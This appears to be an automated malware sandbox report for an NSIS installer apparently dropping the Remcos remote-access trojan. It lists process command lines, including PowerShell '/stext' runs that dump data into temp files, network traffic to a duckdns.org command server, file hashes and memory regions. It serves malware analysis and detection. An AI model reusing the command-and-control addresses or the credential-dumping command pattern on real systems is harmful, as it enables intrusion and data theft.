C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\dtgxucotnzmfifzebwqmlwxcdtnqyepc"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\nnmp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\yqrivmj"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 85.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.201.99:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 a458386d9.duckdns.org udp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
DE 217.76.50.73:3256 a458386d9.duckdns.org tcp
US 8.8.8.8:53 73.50.76.217.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 213.80.50.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nsqC871.tmp\nsDialogs.dll

MD5 1c8b2b40c642e8b5a5b3ff102796fb37
SHA1 3245f55afac50f775eb53fd6d14abb7fe523393d
SHA256 8780095aa2f49725388cddf00d79a74e85c9c4863b366f55c39c606a5fb8440c
SHA512 4ff2dc83f640933162ec8818bb1bf3b3be1183264750946a3d949d2e7068ee606277b6c840193ef2b4663952387f07f6ab12c84c4a11cae9a8de7bd4e7971c57

C:\Users\Admin\AppData\Local\Temp\nsqC871.tmp\BgImage.dll

MD5 521df745a41f0b8164ffd01717cacbba
SHA1 dc7a9eacfbeb1fae52091da5e80db6cb1b6bce74
SHA256 dbf91707fa157603bea025a6411cdcb497ab11262c9c18b14dc431a45aa17c0b
SHA512 c5b1ba062872a8f534e2f0eac57fc3c0d8be9cda79605d86566d67260ba5477444a0ddfed1838b4fb14c677e5342c8419a88fcd38147dbaa36ac1f9e00c52bbe

C:\Users\Admin\AppData\Local\Temp\nsqC871.tmp\UserInfo.dll

MD5 acbda33dd5700c122e2fe48e3d4351fd
SHA1 2c154baf7c64052ee712b7cdf9c36b7697dd3fc8
SHA256 943b33829f9013e4d361482a5c8981ba20a7155c78691dbe02a8f8cd2a02efa0
SHA512 d090adf65a74ac5b910b18bb67e989714335e7b4778cd771cff154d7186351a1bebbc7103cca849bdfa2709c991947ffff6c1d8fdf16a74f4dfb614bce3ff6fd

memory/3220-24-0x000000007336E000-0x000000007336F000-memory.dmp

memory/3220-25-0x0000000004AA0000-0x0000000004AD6000-memory.dmp

memory/3220-26-0x0000000073360000-0x0000000073B10000-memory.dmp

memory/3220-27-0x00000000052A0000-0x00000000058C8000-memory.dmp

memory/3220-28-0x0000000073360000-0x0000000073B10000-memory.dmp

memory/3220-29-0x0000000005190000-0x00000000051B2000-memory.dmp

memory/3220-30-0x0000000005230000-0x0000000005296000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhnqlb3m.fum.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3220-33-0x00000000059D0000-0x0000000005A36000-memory.dmp

memory/3220-37-0x0000000005AC0000-0x0000000005E14000-memory.dmp

memory/3220-42-0x00000000060E0000-0x00000000060FE000-memory.dmp

memory/3220-43-0x0000000006120000-0x000000000616C000-memory.dmp

memory/3220-44-0x0000000006650000-0x00000000066E6000-memory.dmp

memory/3220-46-0x00000000072D0000-0x00000000072F2000-memory.dmp

memory/3220-45-0x0000000006600000-0x000000000661A000-memory.dmp

memory/3220-47-0x00000000078B0000-0x0000000007E54000-memory.dmp

C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San

MD5 bf1ebfd1285dd7ef43a587e9f51a8e33
SHA1 1dede4026611e9f40c91d9bbe406a06b2fd8bfa4
SHA256 de1db1c0a065f580b4fe878c5b363933e45ec7f0c06118d29b6d167af24189ff
SHA512 3b7b11a8989a0b46e4091c8e4c81e71a2454fc9fba77618d844653d548ecd59a2c8b8fce3338fa499ca84da8664f7e34f355ab8b18e3507598f5f63dd3a80389

memory/3220-49-0x00000000084E0000-0x0000000008B5A000-memory.dmp

memory/3220-51-0x0000000073360000-0x0000000073B10000-memory.dmp

memory/3220-52-0x0000000073360000-0x0000000073B10000-memory.dmp

memory/3220-53-0x0000000073360000-0x0000000073B10000-memory.dmp

C:\Users\Admin\AppData\Local\kilns\Unobtainably\Polemoniaceae11.Non

MD5 afc1982fff88592a55312010cfc773c6
SHA1 c57e918c5149ca9c2a331a78ecef84ffc667feb7
SHA256 02a71af4b95cf275ba0430022e9c2665bd1e4ddb3177202c1c3059901eefd4f0
SHA512 f4acf46244cb0115e0666a631af6dd2e7400478103cd9c152e48307a2239108e7e6bf3b39467747b3efa8b0fbdc59216ad6a26ec5587c19bb56fb4512233117e

memory/3220-55-0x0000000073360000-0x0000000073B10000-memory.dmp

memory/3220-56-0x0000000008B60000-0x000000000D71C000-memory.dmp

memory/3220-58-0x0000000073360000-0x0000000073B10000-memory.dmp

memory/3220-57-0x000000007336E000-0x000000007336F000-memory.dmp

memory/3220-60-0x0000000073360000-0x0000000073B10000-memory.dmp

memory/3220-61-0x0000000073360000-0x0000000073B10000-memory.dmp

memory/3220-74-0x0000000008B60000-0x000000000D71C000-memory.dmp

memory/2468-76-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1760-77-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2468-80-0x0000000000400000-0x0000000000478000-memory.dmp

memory/3700-84-0x0000000000400000-0x0000000000424000-memory.dmp

memory/3700-83-0x0000000000400000-0x0000000000424000-memory.dmp

memory/3700-82-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1760-81-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1760-79-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2468-78-0x0000000000400000-0x0000000000478000-memory.dmp

memory/3220-90-0x00000000067E0000-0x00000000067F9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dtgxucotnzmfifzebwqmlwxcdtnqyepc

MD5 60e30555becdb968406edb87fff512ef
SHA1 65551417f6371c40e6d5dab38fe87ab634f9446e
SHA256 9e347aa1a363532c72d7728abe1afdc48b9418fae8cbf8bcbc50c9c22dfefa57
SHA512 cbe1aebf171b54f481028208aa85fb04145cc40772cc30e67107caa5cc70c73f274da362766f125093c1fab1416c687744e53e0f7c30b6ead866c6f6ba671449

memory/3220-94-0x00000000067E0000-0x00000000067F9000-memory.dmp

memory/3220-93-0x00000000067E0000-0x00000000067F9000-memory.dmp

memory/3220-100-0x0000000073360000-0x0000000073B10000-memory.dmp

C:\ProgramData\remcos\logs.dat

MD5 434c9f981eadaffbec7aa8743e23e311
SHA1 d9454d2aaf51e2b1f4660c28006954234963b962
SHA256 2668d8f69a8ada3b2740a5ac2fe5ed1c8fba11a658c62647aa98a526870ba708
SHA512 60a9589eb71556df85a12b633103d7b5246685f353a11ed5aeb8a7cca926e7d193ebb176a770d817b9df16dba12ea1381dc759c888ca3776f5aad8b7b2c7e976

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-10 08:39

Reported

2024-07-10 08:42

Platform

win10v2004-20240709-en

Max time kernel

149s

Max time network

153s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3504 wrote to memory of 4604 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3504 wrote to memory of 4604 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3504 wrote to memory of 4604 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-07-10 08:39

Reported

2024-07-10 08:42

Platform

win7-20240705-en

Max time kernel

117s

Max time network

118s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 220

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-07-10 08:39

Reported

2024-07-10 08:42

Platform

win10v2004-20240709-en

Max time kernel

94s

Max time network

132s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2420 wrote to memory of 2224 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2420 wrote to memory of 2224 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2420 wrote to memory of 2224 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2224 -ip 2224

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 624

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-07-10 08:39

Reported

2024-07-10 08:42

Platform

win7-20240705-en

Max time kernel

120s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 240

Network

N/A

Files

N/A